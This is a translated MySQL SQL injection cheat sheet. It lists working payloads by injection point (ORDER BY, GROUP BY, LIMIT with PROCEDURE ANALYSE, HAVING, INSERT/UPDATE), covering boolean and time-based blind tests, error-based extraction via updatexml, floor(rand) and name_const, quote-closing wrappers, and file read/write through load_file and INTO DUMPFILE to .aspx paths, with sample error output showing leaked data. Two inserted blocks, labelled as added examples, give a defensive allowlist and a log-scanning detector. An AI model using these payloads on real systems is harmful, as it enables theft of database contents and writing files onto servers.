SQL injection summary


Injection points in a SELECT statement (MySQL SELECT syntax):

SELECT
    [ALL | DISTINCT | DISTINCTROW ]
      [HIGH_PRIORITY]
      [STRAIGHT_JOIN]
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position}
      [ASC | DESC], ... [WITH ROLLUP]]
    [HAVING where_condition]
    [ORDER BY {col_name | expr | position}
      [ASC | DESC], ...]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]
    [PROCEDURE procedure_name(argument_list)]
    [INTO OUTFILE 'file_name' export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR UPDATE | LOCK IN SHARE MODE]]

Injection types:
ORDER BY injection
GROUP BY injection
LIMIT x injection
1. with a preceding ORDER BY
2. without a preceding ORDER BY
HAVING injection (similar to WHERE; the difference is that WHERE filters rows before aggregation, while HAVING filters after aggregation)
INTO [OUT|DUMP]FILE injection

(I. ORDER BY injection)
Method 1: IF() test
Guessing the database name
order by 1,if((ord(substr(database(),1,1))>115),1,(select 1 from information_schema.tables));
If >115 is false and >114 is true, the first character is a

Guessing table names
order by 1,if(ord(substr((select GROUP_CONCAT(DISTINCT table_name) from information_schema.columns where table_schema=0x7374756479),1,1))>1,1,(select 1 from information_schema.tables));

Case reference: http://www.wooyun.org/bugs/wooyun-2013-028321

Method 2: CASE expression
order by 1,(select case when(2<1) then 1 else 1*(select username from uc_members)end)=1; returns an error
order by 1,(select case when(2>1) then 1 else 1*(select username from uc_members)end)=1; returns normally

Reference: http://www.oldjun.com/blog/index.php/archives/62/
If the above is hard to follow, this is what I tested locally:
select * from users where id < 5 order by 1,(select case when((ord(substr(database(),1,1))>114)) then 1 else (select 1 from information_schema.tables)end);
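As an added example (not part of the original post), one application-side mitigation for the ORDER BY and LIMIT injections above: the sort column and direction cannot be bound as prepared-statement placeholders, so they are mapped through an allowlist and only the row count is bound. The users table, its column names and the sqlite3 backend are assumptions made for the demonstration.

```python
import sqlite3

# Added example, not from the original post. ORDER BY takes a bare identifier and cannot be
# bound as a placeholder, so the sort column and direction are mapped through an allowlist;
# the LIMIT row count can be bound normally. Table and column names here are assumptions.
ALLOWED_SORT_COLUMNS = {"id": "id", "name": "name", "created": "created_at"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}

def build_user_query(sort, direction="asc", limit=10):
    """Return (sql, params); raises ValueError for anything outside the allowlist."""
    column = ALLOWED_SORT_COLUMNS.get(str(sort).lower())
    order = ALLOWED_DIRECTIONS.get(str(direction).lower())
    if column is None or order is None:
        raise ValueError("rejected sort specification: %r %r" % (sort, direction))
    if not isinstance(limit, int) or isinstance(limit, bool) or not 1 <= limit <= 100:
        raise ValueError("limit must be an integer between 1 and 100")
    # Only allowlisted identifiers reach the SQL text; the row count is a bound parameter.
    return "SELECT id, name FROM users ORDER BY %s %s LIMIT ?" % (column, order), (limit,)

def is_allowed_sort(sort, direction="asc"):
    """True if the (sort, direction) pair would be accepted by build_user_query."""
    try:
        build_user_query(sort, direction)
        return True
    except ValueError:
        return False

def fetch_users(conn, sort, direction="asc", limit=10):
    sql, params = build_user_query(sort, direction, limit)
    return conn.execute(sql, params).fetchall()

def demo_connection():
    """Constructed in-memory table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, created_at TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "2024-01-01"), (2, "bob", "2024-02-01"), (3, "carol", "2024-03-01")])
    return conn

if __name__ == "__main__":
    conn = demo_connection()
    print(fetch_users(conn, "name", "desc", 2))  # [(3, 'carol'), (2, 'bob')]
    payload = "1,if((ord(substr(database(),1,1))>115),1,(select 1 from information_schema.tables))"
    print("blocked" if not is_allowed_sort(payload) else "accepted")
```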

(II. GROUP BY injection)
Same as after WHERE: direct error-based injection
1、group by id and 1=2 union select 1;
2、select * from users group by name and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1);

(III. LIMIT x injection)
Two clauses can follow LIMIT: PROCEDURE and INTO
1. With a preceding ORDER BY
Error-based injection: select * from users order by name limit 3 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1);
Here rand() is a random-number function; extractvalue() (length limit: at most 32 characters) reads XML and is used to trigger the error. updatexml() and similar functions raise the same kind of error.

Time-based injection: select * from users order by name limit 3 PROCEDURE analyse(updatexml(1,if(ord(substr(database(),1,1))>114,BENCHMARK(5000000,md5(1)),null),1),1);

select * from users order by name limit 3 PROCEDURE analyse(updatexml(1,concat(0x7c,if (1=1,BENCHMARK(5000000,md5(1)),null),0x7c),1),1);

PS: Pay attention to the number of arguments inside the error-raising function.

Reference: http://zone.wooyun.org/content/18220

2. Without a preceding ORDER BY
select * from users limit 3 union select 1,database(),3;

(IV. HAVING injection)
Much the same as WHERE
select * from users having 1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1);

(V. INTO [OUT|DUMP]FILE)
Writing or reading files
OUTFILE can write multiple rows, but it escapes the data, so it is unsuitable for exporting binary files
DUMPFILE can write only one row, but it is suitable for binary files

create table a (cmd LONGBLOB);
insert into a (cmd) values (hex(load_file('c:\\1.aspx')));
select unhex(cmd) from a; -- reads the file contents
select unhex(cmd) from a into dumpfile 'c:\\2.aspx'; -- writes the file

(VI. INSERT, UPDATE, DELETE injection)
1. The updatexml() function
Test payload (PS: extractvalue() can likewise be used to retrieve data):
or updatexml(1,concat(0x7e,(version())),0) or

INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(version())),0) or'', 'Nervo');

Data-retrieval payload:
or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or

UPDATE, INSERT and DELETE statements can retrieve database, table and column names

Full walkthrough:
Query the database name:
update user1 set username='Make' or updatexml(0,concat(0x7e,(select distinct table_schema from information_schema.tables limit 1,1)),0) or' ';
ERROR 1105 (HY000): XPATH syntax error: '~alictf'
Enumerate table names:
update user1 set username='Make' or updatexml(0,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),0) or' ';
ERROR 1105 (HY000): XPATH syntax error: '~#admin'
Query data:
mysql> update user1 set username='Make' or updatexml(0,concat(0x7e,(select name from users limit 0,1)),0) or' ';
ERROR 1105 (HY000): XPATH syntax error: '~user1'

2. Subqueries
An UPDATE of this form cannot read data from the table being updated, but the data can be retrieved with a floor()-based error subquery:
Get the database name:
UPDATE users SET password='Nicky' or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' WHERE id=2 and username='Nervo';
ERROR 1062 (23000): Duplicate entry '~'study'~1' for key 'group_key'
Get table names:
UPDATE users SET password='Nicky' or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(table_name as char),0x27,0x7e)) FROM information_schema.tables where table_schema='study' limit 1,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' WHERE id=2 and username='Nervo';
ERROR 1062 (23000): Duplicate entry '~'a'~1' for key 'group_key'
Get data:
UPDATE users SET password='Nicky' or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(username as char),0x27,0x7e)) FROM study.user1 limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' WHERE id=2 and username='Nervo';
ERROR 1062 (23000): Duplicate entry '~'M'~1' for key 'group_key'

3. The name_const() function
name_const() was added in MySQL 5.0.12 and returns the given value. When used to produce a result-set column, NAME_CONST() causes that column to take the given name.
Payload:
or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or

Test whether data can be retrieved
INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT 2),1),name_const((SELECT 2),1))a) or '', 'Nervo');
If it shows ERROR 1210 (HY000): Incorrect arguments to NAME_CONST, this does not work
If it shows ERROR 1060 (42S21): Duplicate column name '2', more data can be retrieved.

Get table names
INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1),name_const(( SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1))a) or '', 'Nervo');
ERROR 1060 (42S21): Duplicate column name 'users'
Get column names
INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1),name_const(( SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1))a) or '', 'Nervo');
ERROR 1060 (42S21): Duplicate column name 'id'
Get data
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT concat_ws(0x7e,id, username, password) FROM users limit 0,1),1),name_const(( SELECT concat_ws(0x7e,id, username, password) FROM users limit 0,1),1))a) or '', 'Nervo');
ERROR 1060 (42S21): Duplicate column name '1~Jane~Eyre'

Quote-closing variants:

' or (payload) or '
' and (payload) and '
' or (payload) and '
' or (payload) and '='
'* (payload) *'
" - (payload) - "
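As an added example (not part of the original post), detection logic a defender could run over a MySQL general or error log for the error-based, time-based and file-write techniques in this section: it flags the function calls the payloads rely on and the exact server errors they provoke. The log line layout and the sample lines are constructed assumptions.

```python
import re

# Added example, not from the original post: signatures for the error-based, time-based and
# file-write statements shown above, plus the server errors those payloads provoke.
QUERY_SIGNATURES = {
    "updatexml/extractvalue error-based": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "name_const duplicate-column": re.compile(r"\bname_const\s*\(", re.I),
    "floor(rand) group_key": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "procedure analyse": re.compile(r"\bprocedure\s+analyse\s*\(", re.I),
    "into outfile/dumpfile": re.compile(r"\binto\s+(outfile|dumpfile)\b", re.I),
    "time-based": re.compile(r"\b(benchmark|sleep)\s*\(", re.I),
    "schema enumeration": re.compile(r"\binformation_schema\.", re.I),
}
ERROR_SIGNATURES = {
    "ERROR 1105 XPATH syntax error": re.compile(r"ERROR 1105 .*XPATH syntax error"),
    "ERROR 1062 group_key duplicate": re.compile(r"ERROR 1062 .*for key 'group_key'"),
    "ERROR 1060 duplicate column name": re.compile(r"ERROR 1060 .*Duplicate column name"),
    "ERROR 1210 NAME_CONST arguments": re.compile(r"ERROR 1210 .*Incorrect arguments to NAME_CONST"),
}

def classify_line(line):
    """Names of every signature matching one log line; an empty list means nothing flagged."""
    return [name for table in (QUERY_SIGNATURES, ERROR_SIGNATURES)
            for name, rx in table.items() if rx.search(line)]

def scan_log(lines):
    """Map 1-based line numbers of flagged lines to their signature names."""
    flagged = {}
    for n, line in enumerate(lines, 1):
        hits = classify_line(line)
        if hits:
            flagged[n] = hits
    return flagged

# Constructed sample log (assumed "<time> <kind> <text>" layout) modelled on this post's statements.
SAMPLE_LOG = [
    "2024-05-01T10:00:00 Query SELECT id, name FROM users ORDER BY name ASC LIMIT 10",
    "2024-05-01T10:00:01 Query update user1 set username='Make' or updatexml(0,concat(0x7e,(select distinct table_schema from information_schema.tables limit 1,1)),0) or' '",
    "2024-05-01T10:00:01 ERROR 1105 (HY000): XPATH syntax error: '~alictf'",
    "2024-05-01T10:00:02 Query select * from users order by name limit 3 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)",
    "2024-05-01T10:00:03 ERROR 1060 (42S21): Duplicate column name 'users'",
    "2024-05-01T10:00:04 Query select unhex(cmd) from a into dumpfile 'c:\\\\2.aspx'",
]

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG).items():
        print(n, ", ".join(hits))
```

The query-text patterns are worth more than the error patterns in practice, because an application that swallows database errors still leaves the statement in the general log.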


ORDER BY sorts the result, ascending by default; adding DESC reverses the order. ORDER BY takes a bare column name rather than a quoted string, so no closing quote needs to be added.

GROUP BY groups rows that share the same value into one group.


Functions:
current_user()

BENCHMARK(1000000,ENCODE('hello','goodbye')); delays the statements that follow by about 5 s
sleep(time); delays execution by the given number of seconds; used inside IF() for time-based blind injection

CASE value WHEN [compare-value] THEN result [WHEN [compare-value] THEN result ...] [ELSE result] END
CASE WHEN [condition] THEN result [WHEN [condition] THEN result ...] [ELSE result] END

Base-conversion functions:
ord() converts a character to its ASCII code
ASCII(str)
BIN(N) returns N as a binary string
OCT(N) returns N as an octal string
HEX(N) returns N as a hexadecimal string
CONV(N,10,16) converts the string N from base 10 to base 16
SHA1(1) hashing
md5()

substr(string, start, length) extracts a substring
Similar functions: mid(), substring()

ord(substr(database(),1,1))
